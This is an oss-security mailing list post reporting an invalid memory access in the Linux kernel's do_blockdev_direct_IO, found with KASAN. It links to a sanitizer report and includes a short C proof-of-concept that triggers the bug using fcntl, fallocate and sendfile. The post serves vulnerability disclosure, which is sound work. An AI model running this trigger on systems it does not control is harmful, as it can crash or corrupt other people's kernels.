oss-security - linux kernel do_blockdev_direct

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [thread-next>] [day] [month] [year] [list]

Message-ID: <CAFkTriL_sGQ=0ym3ALDXjWMYNJxKC3UH02Lx7v9Zj_CsX9NOiA@mail.gmail.com>
Date: Tue, 11 Oct 2016 22:22:48 +0800
From: Marco Grassi <marco.gra@...il.com>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org
Subject: linux kernel do_blockdev_direct_IO invalid memory access

Hello,

I posted this to ask feedback on security at kernel dot org, but I think my
mail got bounced back. Not sure if from the mailing list or from some
single recipient.

Anyway reposting here,

the following program will cause a invalid memory access

BUG: KASAN: wild-memory-access on address 0005080000000000

See this link for the full sanitizer report, stacktrace and trigger poc

https://gist.github.com/marcograss/40850adb3c599ac38e0beac31617d56b

tested on current master, with KASAN.

Marco

---

#include <sys/syscall.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#define _GNU_SOURCE
#include <fcntl.h>
#include <sys/sendfile.h>

int main()
{
  int ret = 0;
  int fd = open("./hurrdurr", O_APPEND|O_RDWR|0x40);
  ret = fcntl(fd, 4, 0x44000, 0, 0, 0);
  ret = fallocate(fd, 0, 0x21, 0xafa6);
  off_t offset = 0;
  ret = sendfile(fd, fd, &offset, 0x800);
  return 0;
}

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.